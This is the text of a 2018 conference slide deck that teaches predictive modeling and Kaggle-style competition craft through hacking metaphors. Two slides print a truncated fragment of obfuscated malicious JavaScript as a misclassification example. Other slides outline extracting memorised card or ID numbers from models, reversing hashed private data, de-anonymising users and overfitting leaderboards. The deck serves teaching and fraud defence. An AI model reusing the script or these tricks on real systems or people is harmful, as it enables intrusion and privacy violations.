Hacking Predictive Modeling - RoadSec 2018

Hacking Predictive Modeling
HJ van Veen - Data Science & InfoSec @ Nubank

2
“Do machine learning like the great [hacker] you are, not like
the great machine learning expert you aren’t.” - Zinkevich 
Rules of Machine Learning: Best Practices for ML Engineering (2015, Zinkevich)

Who am I?
• Thankful for the opportunity to speak here!
• Data scientist & InfoSec analyst at Nubank 
• Competitive data science fanatic 
• Horrible Portuguese speaker (more so with public
speaking). Questions and clariﬁcations in English please. 
• @mlwave

Disclaimer
• These slides are for entertainment, educational and
research purposes only. 
• ML is powerful and easy: “Como toda descoberta cientíﬁca
dá mais poderes sobre a natureza, ela pode aumentar o bem
ou o mal.” - César Lattes 
• Hacking is fun: But not a substitute for rigorous study and
theory. Think of the impact your ML solution has on users. 
 
acm.org/code-of-ethics

Scope
• This presentation will be all over the place. I don’t know if
you never trained a model before, or are experienced with
ML. 
• But I hope this presentation will be interesting for the
hackers, makers, creators of all types. 
• Catch me afterwards, if you want to talk about hyper
optimization.

What is AI?
Self-Normalizing Neural Networks (2017, Klambauer et al.) A Tutorial on Energy-Based Learning (2006, LeCun et al.)

What is AI?
Deep Visual-Semantic Alignments for Generating Image Descriptions (2015, Karpathy et al.)
Boy holds baseball bat Cat sits on couch

What is AI?
• AI grew out of Operations Research after WWII 
• AI consists of many diverse subﬁelds ranging from:
Psychology, Neuroscience, Mathematics, Linguistics,
Learning Theory, (Quantum) Physics, Computer Science,
Information Theory, Statistics, Robotics, Philosophy,
Machine Learning.
• Fight hype. Just replace word `AI` with `Software`: If result
sounds silly or obvious, then the application of AI usually is
too. Power word: “What is your false positive rate?”.

What is Machine Learning?
• Automatically learn from data 
• Increased business usage: AI, Machine Learning, Software
will continue eating the world.
• Unsupervised learning (Amazon Recommendations).
Supervised learning (Spam classiﬁcation). Reinforcement
learning & Self-supervision/Self-play (AlphaGo).
• Consists of: Engineering, research, data management,
domain expertise, analysis, decision science, safety, legal,
ethics, UX, monitoring, predictive modeling. 
Why Software Is Eating the World (2016, Andreessen Horowitz)

What is Predictive Modeling?
• Puts the focus on creating predictions: 
• Use of model,
• how to use the data,
• how to get good accuracy. 
• Essential to create a ﬁrst solution. But the bare minimum to
what goes into Machine Learning at commercial scale. ML
competitions are largely about predictive modeling.

Useful Paradigms
• Functionalism: Input -> Function -> Output 
• Connectionism: Learn from data bottom-up, not top-down
by stacking learning primitives. 
• Black Box Learning: Let the machine do the work. Don’t
care if I understand what it does. 
• Coding Theory: Error detection and compression

Functionalism
• Philosophy of Mind: Mental states are deﬁned by how they
function, not deﬁned by what they are made of.
• Function does not depend on the material: You can build a
functional mouse trap from wood or metal. 
• Perhaps we can model functional intelligence with
computers too?

Functionalism
Transform Model OutputInput
Reality Sensory Processing Mental Modeling Behavior
Data Feature Engineering Predictive Modeling Predictions

Connectionism
• Philosophy of Mind: Cognition can arise by connecting
functional nodes to form a network structure. 
• Artiﬁcial Neural Nets & Deep Learning are examples of this
approach: Stacking layers of nodes for ever higher-level
learning 
• Perhaps we can model intelligence with network
architectures too? 
 
Connectionism - Stanford Encyclopedia of Philosophy (1997, Garson)

Connectionism
Decision Demons
Cognitive Demons
Feature Demons
Image Demons
Pandemonium: A paradigm for learning. (Selfridge, 1959)

Black Box ML
• View machine learning models as a black box: You only
care about what goes in, and what goes out (its function).
"A labrador retriever
puppy with tongue
hanging out"

Black Box ML
• View machine learning models as a black box: You only
care about what goes in, and what goes out (its function).
• Don’t care if there is a magical deamon or a complex
maths formula in the box.
• Question then becomes: How to transform the data, how
to parametrize the black box, so to get the best
predictions?
• Remember: Garbage in - Garbage out (Don’t trust for
critical stuff like healthcare or self-driving cars or AGI)
The Chinese Room Argument - Stanford Encyclopedia of Philosophy (Cole, 2004)

Coding Theory
• Coding theory is concerned with effective communication
and data integrity
• Cryptography, Error Correction, Data Compression: All
about ﬁnding (or hiding) the signal in the noise.
• Machine Learning is essentially learning to correct errors.
• Data compression, just like ML, is about ﬁnding the most
relevant patterns.

Coding Theory
1 MegaByte 180 KiloByte

Data
• Data can be structured or unstructured.
• Tabular data is structured and can more readily be used 
• Text and Sound and Images are unstructured 
• Data can be temporal, for instance: time-series 
• Rarely, data is in shape of a graph (for instance, relations
between gang members)

Feature Engineering
• Most data needs to be converted to numbers ﬁrst 
• Feature engineering: 

Feature Engineering
• Most data needs to be converted to numbers ﬁrst 
• Feature engineering: 
• is transforming data into something a model can
understand.
• Creative part of ML with enough tricks to write a book
• Has a few basic tricks that are enough to get most
models to work well. 
Feature Extraction - Foundations and Applications (Guyon et al., 2006)

Feature Engineering: Tricks
• Categorical Variables 
• One-hot encoding for neural nets: 
 
 
• Label encoding for decision trees:
Red
Green
Blue
1
2
3
Red
Green
Blue
Red Green Blue
1 0 0
0 1 0
0 0 1

Feature Engineering: Tricks
• That’s really (mostly) it! 
• You can now apply the most advanced machine learning
algorithms to data and something you want to predict. 
• More advanced feature engineering uses domain
expertise, intuition, unsupervised learning/embeddings,
and automation (see FeatureTools). 
Feature Engineering - Sao Paulo ML Meetup (2017, van Veen)

Modeling
• A model tries to give accurate predictions for new unseen
data.
• It uses training data together with labels/ground truth/what
you want to predict.

Modeling
Gender Likes Open Source? Wants RoadSec ticket?
1 1 1
0 1 1
1 1 0
0 1 1
1 0 0
0 0 0
1 0 0
0 0 0

Modeling
0 1 ?
• Gender did not show any correlation and 3/4 of people
who Likes Open Source also wanted a RoadSec ticket.
• A good model may predict a probability of 0.75, or a hard
prediction of 1.

Modeling
• What model do you use for data?  
• Tabular data: Gradient boosted decision trees (XGBoost) 
• Images: Pre-trained deep neural net (or Detectron) 
• Text: TFIDF -> Logistic Regression (or FastText, ULMNet,
BERT)
Search for above terms in combination with “machine learning”

Evaluation
1 1 1
0 1 1
1 1 0
0 1 1
1 0 0
0 0 0
1 0 0
0 0 0

Evaluation
1 1 1
0 1 1
1 1 0
0 1 1
1 0 0
0 0 0
1 0 0
0 0 0
Train
Predict
The Elements of Statistical Learning (2001, Friedman et al.)

Evaluation
1 1 1
0 1 1
1 1 0
0 1 1
1 0 0
0 0 0
1 0 0
0 0 0
Train
Predict

Evaluation
Predictions Wants RoadSec ticket?
1 1
1 1
1 0
1 1
0 0
0 0
0 0
0 0
7/8 Accuracy Score

Optimization
• A Python classiﬁer may look like: 
 
FactorizationMachineBinaryClassifier(iters=5,
learning_rate=0.1, latent_dim=20, radius=0.5, 
lambda_linear=0.0001, lambda_latent=0.0001,
normalize='Auto', norm=True, caching='Auto',
shuffle=True, verbose=True)
Trick is to tweak these parameters to get a better evaluation.
Then stop when any change makes evaluation worse.

Brute Forcing
• View hyper parameter optimization as a password
cracking task 
• Enumerate or randomly try all possible parameters within a
range. 
• Dictionary attack: Use “password dictionary ﬁles” with good
parameters that worked on other problems. Try these ﬁrst. 
• This is basically Random Search or Adaptive Search 
Random Search for Hyper-Parameter Optimization (Bergstra et al., 2012)

Brute Forcing
• How to ﬁnd the best weights for an average ensemble?
• Is it differentiable?
• Which optimizer do we pick?
• Do we set any regularization?
• Allow negative weights? 
• How about trying every possible combination of weights
and pick the best evaluation? Worst case: you spend 2
hours more compute. 
KazAnova@kaggle

Brute Forcing
• Do we really need to manually train all these models? 
• What would happen if we automatically train a 1000
random models with random data transformations and
throw them all into another black box? 
• Out comes a winning Kaggle submission…
 
Kaggle Ensembling Guide (van Veen et al., 2015)

Fuzzing with Permutations
• View feature interaction expansion/feature selection as a
fuzzing task.
• Train a model and evaluate on test set. 
• For every column in test set:
• randomly shuﬄe the column
• Evaluate the new predictions
• If evaluation is better with randomly shuﬄed features,
then you can safely discard the column.
  Permutation importance: a corrected feature importance measure (Altmann et al., 2010) via far0n@kaggle
See Fast.AI tutorial for more on this technique.

Script kiddies
• Use tools developed by others
to attack a machine learning
problem.
• ML Community is incentivized
to share easy-replicable code.
• Wield same power as the
biggest AI companies in the
world.
• No shame in this! Start
somewhere, why not near the
top?

Warez
• Good tools:  
• allow you to experiment and iterate quickly 
• have an active community contributing new features 
• can be applied to many different problems with similar
results. 
• abstract away complexity.

Python
• Grown to be essential to data science and machine
learning.  
• Learn Python The Hard Way and you have access to an
amazing machine learning stack.
• Then learn “one-- and preferably only one --obvious way to
do it.”
• Python code can read like pseudo-code 
PEP 20 — The Zen of Python (Peters, 2004)
Beat the benchmark with less then 200MB of memory (tinrtgu, 2014)

Python
from sklearn import datasets, ensemble
iris = datasets.load_iris()
X = iris.data
y = iris.target
model = ensemble.GradientBoostingClassifier()
model.fit(X, y)
p = model.predict(X)

Scikit-Learn
• The Metasploit of Machine Learning 
• Uses one API for all models (models are all trained the
same way, so learn it only once, and have access to all
models) 
• Could get by for a while learning only this library very well 
Scikit-learn: Machine Learning in Python (Pedregosa et al., 2011)

XGBoost
• The best for tabular data:  
• Extremely fast
• Very good performance
• Can model complex problems
• Supports Scikit-Learn API 
• Alternatives: GradientBoostingClassiﬁer, CatBoost,
LightGBM.
XGBoost: A Scalable Tree Boosting System (2016, Chen et al.)

Keras
User-friendly wrapper around deep learning libraries such as
TensorFlow.
• Learn Keras and you can work with the latest architectures
in deep learning. 
• Alternatives: PyTorch with Fast.AI library 
 
Deep Learning with Python (Chollet, 2017)

Vowpal Wabbit
• Very fast online learning on data bigger than memory 
Can be faster and more accurate than Hadoop/Spark
• Uses cool hashing trick inspired by Bloom ﬁlter
• Support for contextual bandits (automated decision
making)
• Eat raw features:
• 1 '10000074 |f category_x_transport emails_cnt:0.0
emails_cnt_x_0 avtomobil_ v ideal_nom sostoanii
exclamationmark 2005
A Reliable Effective Terascale Linear Learning System (Agarwal et al., 2011)

Pandas & NumPy & SciPy
• Read and manipulate tabular data with Pandas 
• Fast, scalable and supports many types of data 
• Perform vector operations on NumPy (or Numba) arrays 
• Wide support for scientiﬁc calculations
 
Python for Data Analysis: Data Wrangling with Pandas, NumPy, and IPython (McKinney, 2011)

Reverse Engineering
• Use frequency tables to reverse engineer the data to its
original form. 
• label:TF -> English_word_frequency(IDF(label)) ->
Porter_Stemmer(word):TF*IDF 
• feature5:bfqm9c -> US_state_population(ratio(bfqm9c)) -> 
State:New_York
Tricks as seen on the Kaggle forums

Reverse Engineering
• Use model predictions to reverse engineer the training
data. 
• Simple brute-force can use ﬁtted language models to
retrieve:
• Credit Card Numbers
• Social Security Numbers / CPF’s
• if it has seen this before once (DL is good at
memorization)
The Secret Sharer: Measuring Unintended Neural Network Memorization & Extracting Secrets (Carlini et al., 2018)

Social Engineering
• You can not survive in most business
with just predictive modeling. 
• Companies don’t hire an AutoML
solution, they hire people. 
• The majority of the day-to-day
complexity in the chain between data
infrastructure and decision makers
is social, not technical.

Social Engineering
• How to gain access to online data science community? 
• Compete together.
• Write a cool blog about it.
• Write/contribute Open Source projects.
• Write tutorials/step-by-step’s. 
• Basically share everything: A 100-line Python script (toy
wrapper for Regularized Greedy Forest) could grow to a
professional project that you now can use yourself.
https://github.com/RGF-team/rgf

Operational Security
• Business:
• Keep pipelines simple
• Document & Revisit
• Automate, Test & Monitor 
• Competitions:
• Loose lips sink ships: Be careful what competitive
advantage you share
• Show not tell: Save your most powerful models ‘till the
very last

Hacking Leaderboards
• Always wanted to rank #1 on a leaderboard? 
• Wacky Boosting:
• Keep changing your submission
• use leaderboard feedback to see if it was a good change
or a bad change.
• Keep good changes.
• Repeat until you are #1 
• Will horribly overﬁt, but can also cause others to overﬁt!
Competing in a data science contest without reading the data (2015, Hardt)

Information Snooping
• Normally not advisable to use the test set. But for
competitions the test is available, so: 
• Can use semi-supervised learning to extract information
from the test set. Use test set for: 
• Frequency (TFIDF) or pre-training language models
• Fitting dimensionality reduction
• Adding conﬁdent predictions as labels to train set
github.com/gatapia Guido Tapia

Rainbow tables
• Sometimes categorical variables are hashed to obscure
them. 
• Can use rainbow tables to reverse (truncated) MD5 hash
and get the original feature. 
• One time, this was obfuscated ordinals for a job puzzle
• One time, this was private data: IP addresses. Oops!
• One time, they forgot to obfuscate a misspelled patient
name in a psychiatric report. Oops!

Breaking Stuff
• Keep asking your curious self:
What would happen if I changed
this to that? Be Bold! 
• Local evaluation is your lifeline. 
• Try everything, keep the good. 
• Once I got an accuracy of 181% by
submitting correct answers twice.
Statisticians
Machine Learners
Smart
Machine Learner
(The joke is that there are only smart statisticians)
CV
Intelligible Models for HealthCare: Predicting Pneumonia Risk and Hospital 30-day Readmission (Caruana, 2015)

DataLeaks
• A very common mistake. Can be deadly for business and
science, so become good at ﬁnding leaks.
• The task was to predict cancer. One of the variables was
“underwent surgery for cancer, yes/no?”
• You can not use data that is not reasonably available at
test time (or your lifeline evaluation can not be trusted).
Leakage in data mining: Formulation, detection, and avoidance (Kaufman et al., 2012)

DataLeaks
• Beware: The more powerful your model, the bigger chance
for exploiting any leakage left that you did not ﬁnd.
• Most powerful model is a 1000 data scientists on a
typewriter, so that’s why competitions see larger leakage
discovery. 
• A large sample of leakage may simply go undetected.
Ben Hamner & Will Cukierski @ Kaggle

DataLeaks
• Winners of Microsoft malware binary classiﬁcation 2015
were able to extract the desktop icon from the code.
Visualize malware patterns - Microsoft Malware Classification Challenge BIG2015, (Chen, 2015)

Sub-Linear Debugging
• Output information while your computations are running,
essential for iteration speed:
• Can spot very fast if some change was good or bad.
• Feels like NEO in the Matrix if you do this with the data
itself during data reading.
• Can spot data health issues (text encoding errors, all
missing in the same row of data, etc.)
Online Learning and Sub-Linear Debugging (Mineiro, 2014)

Error Debugging
• See where your model makes the biggest mistakes.
• Then try to fix it by creating new features
• Below sample confidently predicted as minified JS when it
was actually obfuscated malicious JS: 
 
 
 
 
 
4x66x32x37x62x33x31x38x30x38x31x34x37x63x32x34x30x62x35x65x31
x63x34x35x34x39x63x36x37x64x65x32","x67x65x74x45x6Cx65x6Dx65x6E
x74x73x42x79x43x6Cx61x73x73x4Ex61x6Dx65","x72x65x6Dx6Fx76x65","
x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64"];function
injectarScript(_0x78afx2){return new Promise((_0x78afx3,_0x78afx4)=>{const
_0x78afx5=document[_0xc7ae[1]](_0xc7ae[0]);_0x78afx5[_0xc7ae[2]]=
true;_0x78afx5[_0xc7ae[3]]= _0x78afx2;document[_0xc7ae[5]][
Warsaw.js

Error Debugging
• How to ﬁx?
• Add count of numbers / count of characters
• Add human-readability score
• Add count of “x” / count of characters 
 
 
 
 
 
4x66x32x37x62x33x31x38x30x38x31x34x37x63x32x34x30x62x35x65x31
x63x34x35x34x39x63x36x37x64x65x32","x67x65x74x45x6Cx65x6Dx65x6E
x74x73x42x79x43x6Cx61x73x73x4Ex61x6Dx65","x72x65x6Dx6Fx76x65","
x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64"];function
injectarScript(_0x78afx2){return new Promise((_0x78afx3,_0x78afx4)=>{const
_0x78afx5=document[_0xc7ae[1]](_0xc7ae[0]);_0x78afx5[_0xc7ae[2]]=
true;_0x78afx5[_0xc7ae[3]]= _0x78afx2;document[_0xc7ae[5]][

Dumpster Diving
• You should ﬁnd out the sources and shapes of all your
data, then do a deep dive: 
• Winners of the IJCNN 2011 Challenge wrote a Flickr
crawler to de-anonimize users and obtain the ground truth. 
• Winners of the West Nile Virus Prediction Challenge found
research papers which contained part of the ground truth. 
 
Link Prediction by De-anonymization: How We Won the Kaggle Social Network Challenge (2011, Narayan et al.)

Adversarial Input
• These people are invisible to % of modern face detection
CV Dazzle (Harvey et al., 2010)

Adversarial Input
• This image is confusing to modern object detection
“A foreign attack
helicopter ﬁring missiles”
Is attacking machine learning easier than defending it? (Goodfellow et al., 2017)

Adversarial Input
• Being able to fool neural networks, or build strong
defenses against adversarial images is hugely valuable. 
• NIPS2018: Defense Against Adversarial Attack
• Goodfellow et al.: CleverHans
• Google: Unrestricted Adversarial Examples Challenge

Adversarial Thinking
• Pretend you are an Identity Fraudster:
• Do you hack at night or during your day job/school?
• Do you change details like email to match your victim’s
name?
• Are you more likely to use Windows or Linux?
• Do you move location often, or use Tor to hide your
location?
• Do you try to get as much money as fast as possible or
more patient?
• Do you memorize your victim’s personal details?

Adversarial Thinking
• Try to attack a system, then invent safeguards:
• Encode time of day of the attempt
• Look at string distance between legal name and email
name
• Deduce operating system from user agent string
• Check if IP was used for malicious behavior before
• Check if IP is a Tor IP
• Check for how long user spend in funnel / form behavior
• Check if the user demands an unusually high limit
• …
Statistical Fraud Detection: A Review (Bolton et al., 2002)

Botnet
• Much of commercial ML can or is being automated.
Much of advertisement fraud is automated already.
• It is possible to get a good score in a competition
completely automatically.
• You can aggregate the results of many (automated)
agents and get an even better result.
• Thinking back to the ID fraudster example. Can you
imagine how to cheat a ML competition? Could you
encode ways to safeguard against this?
Clickjacking campaign abuses Google Adsense, avoids ad fraud bots (Segura, 2017)

Case Study: Higgs Boson
• “A ciência não pode prever o que vai acontecer. Só pode
prever a probabilidade de algo acontecer.” - César Lattes 
• Use data from the ATLAS experiment to identify the Higgs
boson (probability of it being signal or background noise) 
• No knowledge of particle physics is required. 
• XGBoost was a 0-day during competition (This could’ve
been you!)
Higgs Boson Detection Challenge (2014, Kaggle & CERN)

Case Study: Higgs Boson
• Lets hack together a solution:
• Create random feature interactions and use Permutation
Feature Importance to select the best ones
• Add the best interactions to the data
• Train 50 randomly initialized XGBoost models
• Pick best log loss model and lower the learning rate and
use early stopping to ﬁnd the best amount of trees.
• Repeat above 3 times and average results
Position: 30/1785

Further Learning
• MOOC’s: Andrew Ng’s Machine Learning on Coursera,
Competitive Data Science Coursera, Abu-Mustafa Caltech
Learning from Data
• Platforms: Kaggle (Tutorials, Projects, Competitions,
Forums, Kernels)
• Programs: Fast.AI (Learn deep learning state-of-the-art)
• Meetups: Sao Paulo Machine Learning Meetup
• Books: Programming Collective Intelligence
• Blogs: MLWave, FastML, MLWhiz, Machine Learning is Fun!
• Professors: Find cool professor and study their online output

nubank.workable.com
Nubank is
hiring!

Hacking Predictive Modeling - RoadSec 2018

More Related Content

What's hot

Similar to Hacking Predictive Modeling - RoadSec 2018

Recently uploaded

Hacking Predictive Modeling - RoadSec 2018